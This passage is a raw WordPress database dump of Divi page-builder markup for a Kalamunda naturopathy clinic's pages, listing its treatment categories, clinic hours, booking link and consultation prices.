custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><br /><br /></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2024-07-01 09:08:20','2024-07-01 01:08:20','',28,'https://verdenaturopathy.com.au/?p=411',0,'revision','',0),(424,1,'2025-04-01 19:55:09','2025-04-01 11:55:09','<!-- wp:divi/placeholder --><!-- wp:divi/section {\"module\":{\"meta\":{\"adminLabel\":{\"desktop\":{\"value\":\"Footer\"}}},\"decoration\":{\"background\":{\"desktop\":{\"value\":{\"gradient\":{\"enabled\":\"on\",\"overlaysImage\":\"on\",\"stops\":[{\"position\":0,\"color\":\"#ffffff\"},{\"position\":100,\"color\":\"rgba(249,243,235,0.8)\"}]}}}},\"overflow\":{\"desktop\":{\"value\":{\"x\":\"hidden\",\"y\":\"hidden\"}}},\"spacing\":{\"desktop\":{\"value\":{\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"0px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"5.0.0-public-alpha.23\",\"locked\":{\"desktop\":{\"value\":\"off\"}}} -->\n<!-- wp:divi/row {\"module\":{\"decoration\":{\"spacing\":{\"desktop\":{\"value\":{\"margin\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"5.0.0-public-alpha.23\",\"modulePreset\":[\"default\"]} -->\n<!-- wp:divi/column {\"module\":{\"advanced\":{\"type\":{\"desktop\":{\"value\":\"4_4\"}}},\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"5.0.0-public-alpha.23\",\"modulePreset\":[\"default\"]} -->\n<!-- wp:divi/text {\"module\":{\"advanced\":{\"text\":{\"text\":{\"desktop\":{\"value\":{\"orientation\":\"center\"}}}}},\"decoration\":{\"sizing\":{\"desktop\":{\"value\":{\"maxWidth\":\"700px\",\"alignment\":\"center\"}}},\"spacing\":{\"desktop\":{\"value\":{\"margin\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"20px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"0px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"content\":{\"decoration\":{\"bodyFont\":{\"body\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Muli\",\"size\":\"16px\",\"lineHeight\":\"1.8em\"}},\"tablet\":{\"value\":{\"size\":\"\"}},\"phone\":{\"value\":{\"size\":\"14px\"}}}}},\"headingFont\":{\"h2\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Josefin Sans\",\"weight\":\"600\",\"size\":\"60px\",\"lineHeight\":\"1.2em\"}},\"tablet\":{\"value\":{\"size\":\"42px\",\"lineHeight\":\"\"}},\"phone\":{\"value\":{\"size\":\"24px\",\"lineHeight\":\"1.4em\"}}}}},\"inlineFont\":{\"desktop\":{\"value\":{\"families\":[\"Playfair Display\"]}}}},\"innerContent\":{\"desktop\":{\"value\":\"\\u003ch2\\u003e\\u003cspan style=\\u0022font-family: \'Playfair Display\'; font-weight: normal;\\u0022\\u003eNaturopathic consults\\u003c/span\\u003e\\u003c/h2\\u003e\"}}},\"builderVersion\":\"5.0.0-public-beta.1\",\"locked\":{\"desktop\":{\"value\":\"off\"}}} /-->\n<!-- /wp:divi/column -->\n<!-- /wp:divi/row -->\n\n<!-- wp:divi/row {\"module\":{\"advanced\":{\"columnStructure\":{\"desktop\":{\"value\":\"1_3,1_3,1_3\"}},\"gutter\":{\"desktop\":{\"value\":{\"enable\":\"on\",\"width\":\"1\",\"makeEqual\":\"on\"}}}},\"decoration\":{\"background\":{\"desktop\":{\"value\":{\"color\":\"#ffffff\"}}},\"sizing\":{\"desktop\":{\"value\":{\"alignment\":\"center\"}}},\"spacing\":{\"desktop\":{\"value\":{\"margin\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"},\"padding\":{\"top\":\"0px\",\"right\":\"0px\",\"bottom\":\"0px\",\"left\":\"0px\",\"syncVertical\":\"on\",\"syncHorizontal\":\"off\"}}}},\"border\":{\"desktop\":{\"value\":{\"radius\":{\"sync\":\"off\",\"topLeft\":\"\",\"topRight\":\"\",\"bottomRight\":\"\",\"bottomLeft\":\"\"}}}},\"boxShadow\":{\"desktop\":{\"value\":{\"style\":\"preset2\",\"color\":\"#000000\"}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"5.0.0-public-alpha.23\"} -->\n<!-- wp:divi/column {\"module\":{\"advanced\":{\"type\":{\"desktop\":{\"value\":\"1_3\"}}},\"decoration\":{\"spacing\":{\"desktop\":{\"value\":{\"padding\":{\"top\":\"\",\"right\":\"0px\",\"bottom\":\"\",\"left\":\"0px\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"5.0.0-public-alpha.23\",\"modulePreset\":[\"default\"]} -->\n<!-- wp:divi/image {\"module\":{\"advanced\":{\"align\":{\"desktop\":{\"value\":\"center\"}},\"sizing\":{\"desktop\":{\"value\":{\"height\":\"140px\"}}},\"spacing\":{\"desktop\":{\"value\":{\"margin\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"20px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"},\"padding\":{\"top\":\"30px\",\"right\":\"\",\"bottom\":\"30px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}}},\"decoration\":{\"background\":{\"desktop\":{\"value\":{\"color\":\"#ccd4c8\"}}},\"attributes\":{\"desktop\":{\"value\":{\"attributes\":[{\"id\":\"11485501-05ca-4f45-ba22-c32ccec03f3c\",\"name\":\"title\",\"value\":\"4-01\",\"adminLabel\":\"Image Title\",\"targetElement\":\"image\"}]}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"image\":{\"innerContent\":{\"desktop\":{\"value\":{\"src\":\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\"}}}},\"builderVersion\":\"5.0.0-public-beta.1\",\"modulePreset\":[\"default\"]} /-->\n\n<!-- wp:divi/blurb {\"imageIcon\":{\"innerContent\":{\"desktop\":{\"value\":{\"useIcon\":\"on\"}}},\"decoration\":{\"animation\":{\"desktop\":{\"value\":{\"style\":\"none\",\"direction\":\"top\",\"intensity\":{\"slide\":\"2\"},\"duration\":\"600ms\"}}}}},\"module\":{\"advanced\":{\"text\":{\"text\":{\"desktop\":{\"value\":{\"orientation\":\"center\"}}}}},\"decoration\":{\"sizing\":{\"desktop\":{\"value\":{\"alignment\":\"center\"}}},\"spacing\":{\"desktop\":{\"value\":{\"padding\":{\"top\":\"10px\",\"right\":\"10px\",\"bottom\":\"10px\",\"left\":\"10px\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"title\":{\"innerContent\":{\"desktop\":{\"value\":{\"text\":\"Initial (60 min) - $215\"}}},\"decoration\":{\"font\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Playfair Display\",\"weight\":\"600\",\"size\":\"22px\",\"lineHeight\":\"1.4em\"}},\"tablet\":{\"value\":{\"size\":\"20px\",\"lineHeight\":\"\"}},\"phone\":{\"value\":{\"size\":\"18px\",\"lineHeight\":\"1.8em\"}}}}}},\"content\":{\"decoration\":{\"bodyFont\":{\"body\":{\"font\":{\"desktop\":{\"value\":{\"style\":[],\"size\":\"16px\",\"lineHeight\":\"1.8em\"}},\"tablet\":{\"value\":{\"size\":\"\"}},\"phone\":{\"value\":{\"size\":\"14px\"}}}}},\"inlineFont\":{\"desktop\":{\"value\":{\"families\":[\"Montserrat\"]}}}},\"innerContent\":{\"desktop\":{\"value\":\"\\u003cp\\u003e\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eA close look into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. \\u003c/span\\u003e\\u003c/p\\u003e\\n\\u003cp\\u003e\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003ePrescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.\\u003c/span\\u003e\\u003c/p\\u003e\\n\\u003cp\\u003e\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003ePathology testing or referrals may be recommended.\\u003c/span\\u003e\\u003c/p\\u003e\"}}},\"builderVersion\":\"5.1.1\"} /-->\n<!-- /wp:divi/column -->\n\n<!-- wp:divi/column {\"module\":{\"advanced\":{\"type\":{\"desktop\":{\"value\":\"1_3\"}}},\"decoration\":{\"background\":{\"desktop\":{\"value\":{\"enableColor\":\"off\",\"color\":\"\"}}},\"spacing\":{\"desktop\":{\"value\":{\"padding\":{\"top\":\"0px\",\"right\":\"0px\",\"bottom\":\"0px\",\"left\":\"0px\",\"syncVertical\":\"on\",\"syncHorizontal\":\"on\"}}},\"tablet\":{\"value\":{\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}},\"phone\":{\"value\":{\"padding\":{\"top\":\"0px\",\"right\":\"\",\"bottom\":\"0px\",\"left\":\"\",\"syncVertical\":\"on\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.9.4\"} -->\n<!-- wp:divi/image {\"module\":{\"advanced\":{\"align\":{\"desktop\":{\"value\":\"center\"}},\"spacing\":{\"desktop\":{\"value\":{\"margin\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"20px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"},\"padding\":{\"top\":\"30px\",\"right\":\"\",\"bottom\":\"30px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}}},\"decoration\":{\"background\":{\"desktop\":{\"value\":{\"color\":\"#ccd4c8\"}}},\"attributes\":{\"desktop\":{\"value\":{\"attributes\":[{\"id\":\"1597635e-31d2-4b21-a6e0-3f65c1a34c32\",\"name\":\"title\",\"value\":\"3-01\",\"adminLabel\":\"Image Title\",\"targetElement\":\"image\"}]}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"image\":{\"innerContent\":{\"desktop\":{\"value\":{\"src\":\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\"}}}},\"builderVersion\":\"5.0.0-public-beta.1\",\"modulePreset\":[\"default\"]} /-->\n\n<!-- wp:divi/blurb {\"imageIcon\":{\"innerContent\":{\"desktop\":{\"value\":{\"useIcon\":\"on\"}}},\"decoration\":{\"animation\":{\"desktop\":{\"value\":{\"style\":\"none\",\"direction\":\"top\",\"intensity\":{\"slide\":\"2\"},\"duration\":\"600ms\"}}}}},\"module\":{\"advanced\":{\"text\":{\"text\":{\"desktop\":{\"value\":{\"orientation\":\"center\"}}}}},\"decoration\":{\"sizing\":{\"desktop\":{\"value\":{\"alignment\":\"center\"}}},\"spacing\":{\"desktop\":{\"value\":{\"padding\":{\"top\":\"10px\",\"right\":\"10px\",\"bottom\":\"10px\",\"left\":\"10px\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"title\":{\"innerContent\":{\"desktop\":{\"value\":{\"text\":\"Follow-up (30 min) - $105\"}}},\"decoration\":{\"font\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Playfair Display\",\"weight\":\"600\",\"size\":\"22px\",\"lineHeight\":\"1.4em\"}},\"tablet\":{\"value\":{\"size\":\"20px\",\"lineHeight\":\"\"}},\"phone\":{\"value\":{\"size\":\"18px\",\"lineHeight\":\"1.8em\"}}}}}},\"content\":{\"decoration\":{\"bodyFont\":{\"body\":{\"font\":{\"desktop\":{\"value\":{\"style\":[],\"size\":\"16px\",\"lineHeight\":\"1.8em\"}},\"tablet\":{\"value\":{\"size\":\"\"}},\"phone\":{\"value\":{\"size\":\"14px\"}}}}},\"inlineFont\":{\"desktop\":{\"value\":{\"families\":[\"Montserrat\"]}}}},\"innerContent\":{\"desktop\":{\"value\":\"\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eThis time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.\\u003c/span\\u003e\"}}},\"builderVersion\":\"5.1.1\"} /-->\n<!-- /wp:divi/column -->\n\n<!-- wp:divi/column {\"module\":{\"advanced\":{\"type\":{\"desktop\":{\"value\":\"1_3\"}}},\"decoration\":{\"background\":{\"desktop\":{\"value\":{\"enableColor\":\"off\",\"color\":\"\"}}},\"spacing\":{\"desktop\":{\"value\":{\"padding\":{\"top\":\"0px\",\"right\":\"0px\",\"bottom\":\"0px\",\"left\":\"0px\",\"syncVertical\":\"on\",\"syncHorizontal\":\"on\"}}},\"tablet\":{\"value\":{\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}},\"phone\":{\"value\":{\"padding\":{\"top\":\"0px\",\"right\":\"\",\"bottom\":\"0px\",\"left\":\"\",\"syncVertical\":\"on\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.9.4\"} -->\n<!-- wp:divi/image {\"module\":{\"advanced\":{\"align\":{\"desktop\":{\"value\":\"center\"}},\"sizing\":{\"desktop\":{\"value\":{\"width\":\"100%\"}}},\"spacing\":{\"desktop\":{\"value\":{\"margin\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"20px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"},\"padding\":{\"top\":\"30px\",\"right\":\"\",\"bottom\":\"30px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}}},\"decoration\":{\"background\":{\"desktop\":{\"value\":{\"color\":\"#ccd4c8\"}}},\"attributes\":{\"desktop\":{\"value\":{\"attributes\":[{\"id\":\"d3c3ec35-d93d-429e-8080-8c59e75637df\",\"name\":\"title\",\"value\":\"2-01\",\"adminLabel\":\"Image Title\",\"targetElement\":\"image\"}]}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"image\":{\"innerContent\":{\"desktop\":{\"value\":{\"src\":\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\"}}}},\"builderVersion\":\"5.0.0-public-beta.1\",\"modulePreset\":[\"default\"]} /-->\n\n<!-- wp:divi/blurb {\"imageIcon\":{\"innerContent\":{\"desktop\":{\"value\":{\"useIcon\":\"on\"}}},\"decoration\":{\"animation\":{\"desktop\":{\"value\":{\"style\":\"none\",\"direction\":\"top\",\"intensity\":{\"slide\":\"2\"},\"duration\":\"600ms\"}}}}},\"module\":{\"advanced\":{\"text\":{\"text\":{\"desktop\":{\"value\":{\"orientation\":\"center\"}}}}},\"decoration\":{\"sizing\":{\"desktop\":{\"value\":{\"alignment\":\"center\"}}},\"spacing\":{\"desktop\":{\"value\":{\"padding\":{\"top\":\"10px\",\"right\":\"10px\",\"bottom\":\"10px\",\"left\":\"10px\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"title\":{\"innerContent\":{\"desktop\":{\"value\":{\"text\":\"Express (20 min) - $75\"}}},\"decoration\":{\"font\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Playfair Display\",\"weight\":\"600\",\"size\":\"22px\",\"lineHeight\":\"1.4em\"}},\"tablet\":{\"value\":{\"size\":\"20px\",\"lineHeight\":\"\"}},\"phone\":{\"value\":{\"size\":\"18px\",\"lineHeight\":\"1.8em\"}}}}}},\"content\":{\"decoration\":{\"bodyFont\":{\"body\":{\"font\":{\"desktop\":{\"value\":{\"style\":[],\"size\":\"16px\",\"lineHeight\":\"1.8em\"}},\"tablet\":{\"value\":{\"size\":\"\"}},\"phone\":{\"value\":{\"size\":\"14px\"}}}}},\"inlineFont\":{\"desktop\":{\"value\":{\"families\":[\"Montserrat\"]}}}},\"innerContent\":{\"desktop\":{\"value\":\"\\u003cp\\u003e\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eA shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.\\u003c/span\\u003e \\u003cstrong\\u003eExisting clients only.\\u003c/strong\\u003e\\u003c/p\\u003e\"}}},\"builderVersion\":\"5.1.1\"} /-->\n<!-- /wp:divi/column -->\n<!-- /wp:divi/row -->\n\n<!-- wp:divi/row {\"module\":{\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.4.7\"} -->\n<!-- wp:divi/column {\"module\":{\"advanced\":{\"type\":{\"desktop\":{\"value\":\"4_4\"}}},\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.4.7\"} -->\n<!-- wp:divi/text {\"module\":{\"advanced\":{\"text\":{\"text\":{\"desktop\":{\"value\":{\"orientation\":\"center\"}}}}},\"decoration\":{\"sizing\":{\"desktop\":{\"value\":{\"maxWidth\":\"700px\",\"alignment\":\"center\"}}},\"spacing\":{\"desktop\":{\"value\":{\"margin\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"20px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"0px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"content\":{\"decoration\":{\"bodyFont\":{\"body\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Muli\",\"size\":\"16px\",\"lineHeight\":\"1.8em\"}},\"tablet\":{\"value\":{\"size\":\"\"}},\"phone\":{\"value\":{\"size\":\"14px\"}}}}},\"headingFont\":{\"h2\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Josefin 